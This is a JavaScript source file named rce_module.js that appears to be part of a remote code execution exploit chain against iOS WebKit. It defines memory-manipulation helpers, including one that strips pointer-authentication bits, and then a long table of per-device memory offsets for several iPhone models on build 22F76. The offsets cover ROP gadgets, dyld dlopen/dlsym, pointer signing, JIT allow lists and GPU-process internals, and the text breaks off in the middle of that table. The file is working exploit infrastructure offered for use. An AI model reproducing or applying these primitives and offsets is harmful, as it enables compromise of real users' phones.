/ rce_module.js
rce_module.js
1 /* HEADERS */ 2 const ab = new ArrayBuffer(8); 3 const u64 = new BigUint64Array(ab); 4 const u32 = new Uint32Array(ab); 5 const u8 = new Uint8Array(ab); 6 const f64 = new Float64Array(ab); 7 8 BigInt.fromDouble = function(v) { f64[0] = v; return u64[0]; }; 9 BigInt.fromBytes = function(bytes) { for (let i = 0; i < 8; ++i) { u8[i] = bytes[i]; } return u64[0]; }; 10 BigInt.prototype.hex = function() { let s = '0x' + this.toString(16); return s; }; 11 BigInt.prototype.asDouble = function() { u64[0] = this; return f64[0]; }; 12 BigInt.prototype.add = function(other) { return this + other; }; 13 BigInt.prototype.sub = function(other) { return this - other; } 14 BigInt.prototype.noPAC = function() { return this & 0x7fffffffffn; } 15 BigInt.prototype.asInt32s = function() { 16 u64[0] = this; 17 let lo = u32[0]; 18 let hi = u32[1]; 19 if (hi >= 0x80000000) { 20 hi = (hi - 0x100000000) & 0xffffffff; 21 } 22 if (lo >= 0x80000000) { 23 lo = (lo - 0x100000000) & 0xffffffff; 24 } 25 return [lo, hi]; 26 }; 27 [].shift(); 28 /* HEADERS END */ 29 rce_offsets = { 30 "iPhone11,2_4_6_22F76": { 31 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadec98n, 32 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edade780n, 33 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edade6e0n, 34 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edade730n, 35 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddb28n, 36 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 37 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 38 CAPointer: 0x20n, 39 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 40 CGContextDelegate: 0x28n, 41 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 42 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 43 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 44 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 45 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 46 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 47 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 48 DesktopServicesPriv_bss: 0x1ecca3a08n, 49 Foundation__NSBundleTables_bundleTables_value: 0x1ed8eb848n, 50 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 51 GPUProcess_singleton: 0x1eb924a98n, 52 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 53 HOMEUI_cstring: 0x182f75636n, 54 IOSurfaceContextDelegate: 0x120n, 55 IOSurfaceDrawable: 0x150n, 56 IOSurfaceQueue: 0x48n, 57 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 58 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be1b0n, 59 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9bde60n, 60 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9bde68n, 61 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9bde70n, 62 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9bddb0n, 63 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9bde78n, 64 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 65 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 66 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 67 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 68 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 69 PerfPowerServicesReader_cstring: 0x257c7be60n, 70 RemoteGraphicsContextGLWorkQueue: 0x1eda5e418n, 71 RemoteRenderingBackendProxy_off: 0x830n, 72 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 73 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 74 Security__gSecurityd: 0x1eb67fd78n, 75 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 76 UI_m_connection: 0x28n, 77 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 78 WebCore__PAL_getPKContactClass: 0x1eda62678n, 79 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 80 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 81 WebCore__initPKContact_once: 0x1eda6b1b8n, 82 WebCore__initPKContact_value: 0x1eda6b1c0n, 83 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69980n, 84 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69978n, 85 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69960n, 86 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 87 WebProcess_ensureGPUProcessConnection: 0x199195958n, 88 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 89 WebProcess_singleton: 0x1eda5f5c0n, 90 __pthread_head: 0x269008020n, 91 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 92 dyld__RuntimeState_vtable: 0x1f2871aa0n, 93 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 94 dyld__signPointer: 0x1a9a3f3e4n, 95 emptyString: 0x1edb14420n, 96 free_slabs: 0x1ed9a4f90n, 97 gadget_control_1_ios184: 0x23f2f82ecn, 98 gadget_control_2_ios184: 0x1ad86ac28n, 99 gadget_control_3_ios184: 0x21f256150n, 100 gadget_loop_1_ios184: 0x1865f818cn, 101 gadget_loop_2_ios184: 0x20d23dda8n, 102 gadget_loop_3_ios184: 0x184d29f1cn, 103 gadget_set_all_registers_ios184: 0x20dfb616cn, 104 jsc_base: 0x19a45a000n, 105 libARI_cstring: 0x218ac7820n, 106 libGPUCompilerImplLazy__invoker: 0x23d09d7e8n, 107 libGPUCompilerImplLazy_cstring: 0x23c1e7870n, 108 libdyld__dlopen: 0x1ad86c7b8n, 109 libdyld__dlsym: 0x1ad86da34n, 110 libdyld__gAPIs: 0x1ed5b8000n, 111 libsystem_c__atexit_mutex: 0x1ed8ca458n, 112 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 113 libsystem_pthread_base: 0x20d28c000n, 114 m_backend: 0x70n, 115 m_drawingArea: 0x50n, 116 m_gpuProcessConnection: 0x158n, 117 m_gpuProcessConnection_m_identifier: 0x38n, 118 m_imageBuffer: 0x18n, 119 m_isRenderingSuspended: 0xe8n, 120 m_platformContext: 0x38n, 121 m_remoteDisplayLists: 0x70n, 122 m_remoteRenderingBackendMap: 0xe8n, 123 m_webProcessConnections: 0x80n, 124 mach_task_self_ptr: 0x1ed8c96c0n, 125 mainRunLoop: 0x1edb2c020n, 126 privateState_off: 0x7e8n, 127 pthread_create_jsc: 0x19bd26f30n, 128 pthread_create_offset: 0x6988n, 129 runLoopHolder_tid: 0x1edb3c708n, 130 rxBufferMtl_off: 0x100n, 131 rxMtlBuffer_off: 0x70n, 132 vertexAttribVector_off: 0x2548n 133 }, 134 "iPhone11,8_22F76": { 135 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadec98n, 136 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edade780n, 137 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edade6e0n, 138 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edade730n, 139 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddb28n, 140 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 141 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 142 CAPointer: 0x20n, 143 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 144 CGContextDelegate: 0x28n, 145 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 146 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 147 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 148 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 149 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 150 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 151 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 152 DesktopServicesPriv_bss: 0x1ecca3a08n, 153 Foundation__NSBundleTables_bundleTables_value: 0x1ed8eb848n, 154 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 155 GPUProcess_singleton: 0x1eb924a98n, 156 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 157 HOMEUI_cstring: 0x182f75636n, 158 IOSurfaceContextDelegate: 0x120n, 159 IOSurfaceDrawable: 0x150n, 160 IOSurfaceQueue: 0x48n, 161 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 162 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be1b0n, 163 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9bde60n, 164 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9bde68n, 165 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9bde70n, 166 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9bddb0n, 167 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9bde78n, 168 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 169 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 170 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 171 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 172 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 173 PerfPowerServicesReader_cstring: 0x257c47e60n, 174 RemoteGraphicsContextGLWorkQueue: 0x1eda5e418n, 175 RemoteRenderingBackendProxy_off: 0x830n, 176 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 177 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 178 Security__gSecurityd: 0x1eb67fd78n, 179 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 180 UI_m_connection: 0x28n, 181 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 182 WebCore__PAL_getPKContactClass: 0x1eda62678n, 183 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 184 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 185 WebCore__initPKContact_once: 0x1eda6b1b8n, 186 WebCore__initPKContact_value: 0x1eda6b1c0n, 187 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69980n, 188 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69978n, 189 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69960n, 190 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 191 WebProcess_ensureGPUProcessConnection: 0x199195958n, 192 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 193 WebProcess_singleton: 0x1eda5f5c0n, 194 __pthread_head: 0x269000020n, 195 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 196 dyld__RuntimeState_vtable: 0x1f2871aa0n, 197 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 198 dyld__signPointer: 0x1a9a3f3e4n, 199 emptyString: 0x1edb14420n, 200 free_slabs: 0x1ed9a4f90n, 201 gadget_control_1_ios184: 0x23f2c42ecn, 202 gadget_control_2_ios184: 0x1ad86ac28n, 203 gadget_control_3_ios184: 0x21f256150n, 204 gadget_loop_1_ios184: 0x1865f818cn, 205 gadget_loop_2_ios184: 0x20d23dda8n, 206 gadget_loop_3_ios184: 0x184d29f1cn, 207 gadget_set_all_registers_ios184: 0x20dfb616cn, 208 jsc_base: 0x19a45a000n, 209 libARI_cstring: 0x218ac7820n, 210 libGPUCompilerImplLazy__invoker: 0x23d0697e8n, 211 libGPUCompilerImplLazy_cstring: 0x23c1b3870n, 212 libdyld__dlopen: 0x1ad86c7b8n, 213 libdyld__dlsym: 0x1ad86da34n, 214 libdyld__gAPIs: 0x1ed5b8000n, 215 libsystem_c__atexit_mutex: 0x1ed8ca458n, 216 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 217 libsystem_pthread_base: 0x20d28c000n, 218 m_backend: 0x70n, 219 m_drawingArea: 0x50n, 220 m_gpuProcessConnection: 0x158n, 221 m_gpuProcessConnection_m_identifier: 0x38n, 222 m_imageBuffer: 0x18n, 223 m_isRenderingSuspended: 0xe8n, 224 m_platformContext: 0x38n, 225 m_remoteDisplayLists: 0x70n, 226 m_remoteRenderingBackendMap: 0xe8n, 227 m_webProcessConnections: 0x80n, 228 mach_task_self_ptr: 0x1ed8c96c0n, 229 mainRunLoop: 0x1edb2c020n, 230 privateState_off: 0x7e8n, 231 pthread_create_jsc: 0x19bd26f30n, 232 pthread_create_offset: 0x6988n, 233 runLoopHolder_tid: 0x1edb3c708n, 234 rxBufferMtl_off: 0x100n, 235 rxMtlBuffer_off: 0x70n, 236 vertexAttribVector_off: 0x2548n 237 }, 238 "iPhone12,1_22F76": { 239 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadecd8n, 240 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edade7c0n, 241 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edade720n, 242 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edade770n, 243 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddb68n, 244 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 245 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 246 CAPointer: 0x20n, 247 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 248 CGContextDelegate: 0x28n, 249 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 250 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 251 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 252 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 253 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 254 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 255 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 256 DesktopServicesPriv_bss: 0x1ecca3a08n, 257 Foundation__NSBundleTables_bundleTables_value: 0x1ed8eb888n, 258 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 259 GPUProcess_singleton: 0x1eb924a98n, 260 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 261 HOMEUI_cstring: 0x182f75636n, 262 IOSurfaceContextDelegate: 0x120n, 263 IOSurfaceDrawable: 0x150n, 264 IOSurfaceQueue: 0x48n, 265 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 266 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be1f0n, 267 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9bdea0n, 268 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9bdea8n, 269 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9bdeb0n, 270 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9bddf0n, 271 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9bdeb8n, 272 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 273 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 274 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 275 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 276 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 277 PerfPowerServicesReader_cstring: 0x257c8fe60n, 278 RemoteGraphicsContextGLWorkQueue: 0x1eda5e458n, 279 RemoteRenderingBackendProxy_off: 0x830n, 280 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 281 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 282 Security__gSecurityd: 0x1eb67fd78n, 283 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 284 UI_m_connection: 0x28n, 285 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 286 WebCore__PAL_getPKContactClass: 0x1eda626b8n, 287 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 288 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 289 WebCore__initPKContact_once: 0x1eda6b1f8n, 290 WebCore__initPKContact_value: 0x1eda6b200n, 291 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda699c0n, 292 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda699b8n, 293 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda699a0n, 294 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 295 WebProcess_ensureGPUProcessConnection: 0x199195958n, 296 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 297 WebProcess_singleton: 0x1eda5f600n, 298 __pthread_head: 0x269104020n, 299 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 300 dyld__RuntimeState_vtable: 0x1f2871aa0n, 301 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 302 dyld__signPointer: 0x1a9a3f3e4n, 303 emptyString: 0x1edb14420n, 304 free_slabs: 0x1ed9a4fd0n, 305 gadget_control_1_ios184: 0x23f2c42ecn, 306 gadget_control_2_ios184: 0x1ad86ac28n, 307 gadget_control_3_ios184: 0x21f256150n, 308 gadget_loop_1_ios184: 0x1865f818cn, 309 gadget_loop_2_ios184: 0x20d23dda8n, 310 gadget_loop_3_ios184: 0x184d29f1cn, 311 gadget_set_all_registers_ios184: 0x20dfb616cn, 312 jsc_base: 0x19a45a000n, 313 libARI_cstring: 0x218ac7820n, 314 libGPUCompilerImplLazy__invoker: 0x23d0697e8n, 315 libGPUCompilerImplLazy_cstring: 0x23c1b3870n, 316 libdyld__dlopen: 0x1ad86c7b8n, 317 libdyld__dlsym: 0x1ad86da34n, 318 libdyld__gAPIs: 0x1ed5b8000n, 319 libsystem_c__atexit_mutex: 0x1ed8ca498n, 320 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 321 libsystem_pthread_base: 0x20d28c000n, 322 m_backend: 0x70n, 323 m_drawingArea: 0x50n, 324 m_gpuProcessConnection: 0x158n, 325 m_gpuProcessConnection_m_identifier: 0x38n, 326 m_imageBuffer: 0x18n, 327 m_isRenderingSuspended: 0xe8n, 328 m_platformContext: 0x38n, 329 m_remoteDisplayLists: 0x70n, 330 m_remoteRenderingBackendMap: 0xe8n, 331 m_webProcessConnections: 0x80n, 332 mach_task_self_ptr: 0x1ed8c9700n, 333 mainRunLoop: 0x1edb2c020n, 334 privateState_off: 0x7e8n, 335 pthread_create_jsc: 0x19bd26f30n, 336 pthread_create_offset: 0x6988n, 337 runLoopHolder_tid: 0x1edb3c708n, 338 rxBufferMtl_off: 0x100n, 339 rxMtlBuffer_off: 0x70n, 340 vertexAttribVector_off: 0x2548n 341 }, 342 "iPhone12,3_5_22F76": { 343 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadecd8n, 344 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edade7c0n, 345 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edade720n, 346 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edade770n, 347 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddb68n, 348 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 349 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 350 CAPointer: 0x20n, 351 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 352 CGContextDelegate: 0x28n, 353 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 354 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 355 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 356 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 357 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 358 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 359 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 360 DesktopServicesPriv_bss: 0x1ecca3a08n, 361 Foundation__NSBundleTables_bundleTables_value: 0x1ed8eb888n, 362 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 363 GPUProcess_singleton: 0x1eb924a98n, 364 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 365 HOMEUI_cstring: 0x182f75636n, 366 IOSurfaceContextDelegate: 0x120n, 367 IOSurfaceDrawable: 0x150n, 368 IOSurfaceQueue: 0x48n, 369 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 370 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be1f0n, 371 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9bdea0n, 372 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9bdea8n, 373 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9bdeb0n, 374 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9bddf0n, 375 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9bdeb8n, 376 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 377 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 378 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 379 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 380 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 381 PerfPowerServicesReader_cstring: 0x257c8fe60n, 382 RemoteGraphicsContextGLWorkQueue: 0x1eda5e458n, 383 RemoteRenderingBackendProxy_off: 0x830n, 384 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 385 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 386 Security__gSecurityd: 0x1eb67fd78n, 387 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 388 UI_m_connection: 0x28n, 389 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 390 WebCore__PAL_getPKContactClass: 0x1eda626b8n, 391 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 392 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 393 WebCore__initPKContact_once: 0x1eda6b1f8n, 394 WebCore__initPKContact_value: 0x1eda6b200n, 395 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda699c0n, 396 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda699b8n, 397 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda699a0n, 398 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 399 WebProcess_ensureGPUProcessConnection: 0x199195958n, 400 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 401 WebProcess_singleton: 0x1eda5f600n, 402 __pthread_head: 0x269104020n, 403 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 404 dyld__RuntimeState_vtable: 0x1f2871aa0n, 405 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 406 dyld__signPointer: 0x1a9a3f3e4n, 407 emptyString: 0x1edb14420n, 408 free_slabs: 0x1ed9a4fd0n, 409 gadget_control_1_ios184: 0x23f2c42ecn, 410 gadget_control_2_ios184: 0x1ad86ac28n, 411 gadget_control_3_ios184: 0x21f256150n, 412 gadget_loop_1_ios184: 0x1865f818cn, 413 gadget_loop_2_ios184: 0x20d23dda8n, 414 gadget_loop_3_ios184: 0x184d29f1cn, 415 gadget_set_all_registers_ios184: 0x20dfb616cn, 416 jsc_base: 0x19a45a000n, 417 libARI_cstring: 0x218ac7820n, 418 libGPUCompilerImplLazy__invoker: 0x23d0697e8n, 419 libGPUCompilerImplLazy_cstring: 0x23c1b3870n, 420 libdyld__dlopen: 0x1ad86c7b8n, 421 libdyld__dlsym: 0x1ad86da34n, 422 libdyld__gAPIs: 0x1ed5b8000n, 423 libsystem_c__atexit_mutex: 0x1ed8ca498n, 424 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 425 libsystem_pthread_base: 0x20d28c000n, 426 m_backend: 0x70n, 427 m_drawingArea: 0x50n, 428 m_gpuProcessConnection: 0x158n, 429 m_gpuProcessConnection_m_identifier: 0x38n, 430 m_imageBuffer: 0x18n, 431 m_isRenderingSuspended: 0xe8n, 432 m_platformContext: 0x38n, 433 m_remoteDisplayLists: 0x70n, 434 m_remoteRenderingBackendMap: 0xe8n, 435 m_webProcessConnections: 0x80n, 436 mach_task_self_ptr: 0x1ed8c9700n, 437 mainRunLoop: 0x1edb2c020n, 438 privateState_off: 0x7e8n, 439 pthread_create_jsc: 0x19bd26f30n, 440 pthread_create_offset: 0x6988n, 441 runLoopHolder_tid: 0x1edb3c708n, 442 rxBufferMtl_off: 0x100n, 443 rxMtlBuffer_off: 0x70n, 444 vertexAttribVector_off: 0x2548n 445 }, 446 "iPhone12,8_22F76": { 447 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadea98n, 448 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edade580n, 449 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edade4e0n, 450 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edade530n, 451 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edadd928n, 452 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 453 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 454 CAPointer: 0x20n, 455 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 456 CGContextDelegate: 0x28n, 457 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 458 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 459 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 460 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 461 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 462 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 463 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ada98n, 464 DesktopServicesPriv_bss: 0x1ecca3a08n, 465 Foundation__NSBundleTables_bundleTables_value: 0x1ed8eb648n, 466 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 467 GPUProcess_singleton: 0x1eb924a98n, 468 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 469 HOMEUI_cstring: 0x182f75636n, 470 IOSurfaceContextDelegate: 0x120n, 471 IOSurfaceDrawable: 0x150n, 472 IOSurfaceQueue: 0x48n, 473 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 474 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9bdfb0n, 475 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9bdc60n, 476 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9bdc68n, 477 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9bdc70n, 478 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9bdbb0n, 479 